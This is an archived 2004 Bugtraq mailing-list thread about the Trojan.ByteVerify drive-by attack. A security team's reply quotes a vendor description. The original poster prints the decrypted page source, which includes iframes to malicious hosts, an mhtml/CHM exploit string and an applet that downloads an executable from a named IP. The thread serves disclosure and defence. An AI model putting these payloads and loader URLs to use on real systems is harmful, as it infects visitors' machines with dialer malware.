Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Strange Java Loader (not so strange - Trojan.ByteVerify)

From: K-OTiK Security <Special-Alerts () k-otik com>
Date: 31 Dec 2004 01:58:02 -0000
In-Reply-To: <116798078.20041230073423 () gmx net>


so far, anyone knows how to protect from this crap?


Update your Windows and your antivirus software !

this attack is known as "Trojan.ByteVerify". It exploits the "Internet Explorer/Outlook CHM File Processing Arbitrary 
Code Execution Vulnerability (MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw (MS03-011)". 

<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:

Escapes the sandbox restrictions, using Blackbox.class, by doing the following:

Declares a new PermissionDataSet with setFullyTrusted set to TRUE. 
Creates a trusted PermissionSet. 
Sets permission to PermissionSet by creating its own URLClassLoader class, derived from the VerifierBug.class.

Loads Beyond.class using the URLClassLoader from Blackbox.class.

Gains unrestricted rights on the local machine by invoking the .assertPermission method of the PolicyEngine class in 
Beyond.class.
[...]
May attempt to retrieve dialer programs and install them on the infected computer. The dialer programs may attempt to 
connect the infected computer to pornographic Web sites.

Threat Known As :
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend] 

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 



Hi People,

before reading this,
dont go on any of the sites
unless you are sure ;)

after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>
-------------------------------------

this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
   &lt;object data="${PR}" type="text/x-scriptlet">&lt;/object&gt;
</textarea>

&lt;script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm&apos;));
&lt;/script&gt;
&lt;applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter>&lt;/APPLET&gt;</body></html>
----------------------------------------------------

the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe

this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,

so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)

cya, Stefan
Previous By Date Next
Previous By Thread Next

Current thread: